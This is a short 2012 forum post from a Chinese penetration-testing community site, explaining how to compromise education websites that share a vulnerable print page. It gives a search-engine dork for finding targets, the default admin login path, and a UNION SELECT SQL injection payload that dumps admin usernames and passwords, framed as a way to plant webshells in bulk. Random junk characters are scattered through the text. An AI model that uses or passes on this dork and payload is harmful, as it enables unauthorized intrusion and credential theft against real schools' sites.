中国网络渗透测试联盟

标题: 某教育站打印页面漏洞批量webshell [打印本页]
作者: admin    时间: 2012-10-31 08:37
标题: 某教育站打印页面漏洞批量webshell
教育站打印页面漏洞  _1 F) {0 o4 T$ e
百度或google搜索 inurl:info_Print.asp?ArticleID=/ }2 K1 S$ H3 U5 I6 V
默认后台:/ad_login.asp
+ `4 d8 _; r* u' C爆管理员密码:8 N$ ?* m  @4 C+ i: p! E. F) [
在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
3 u" S# P; B5 m9 j* a. f3 G# j
, g% g7 F; `" x$ w/ L4 Runion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin+ [: y, N. ?; L; D# c
# z4 |& i' h6 `1 L6 q" u$ r
作者:佚名 ! r6 `: j; }7 X6 i9 s& t

  S" @2 Z0 H  a 9 |' z7 O7 r9 ~7 ^




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2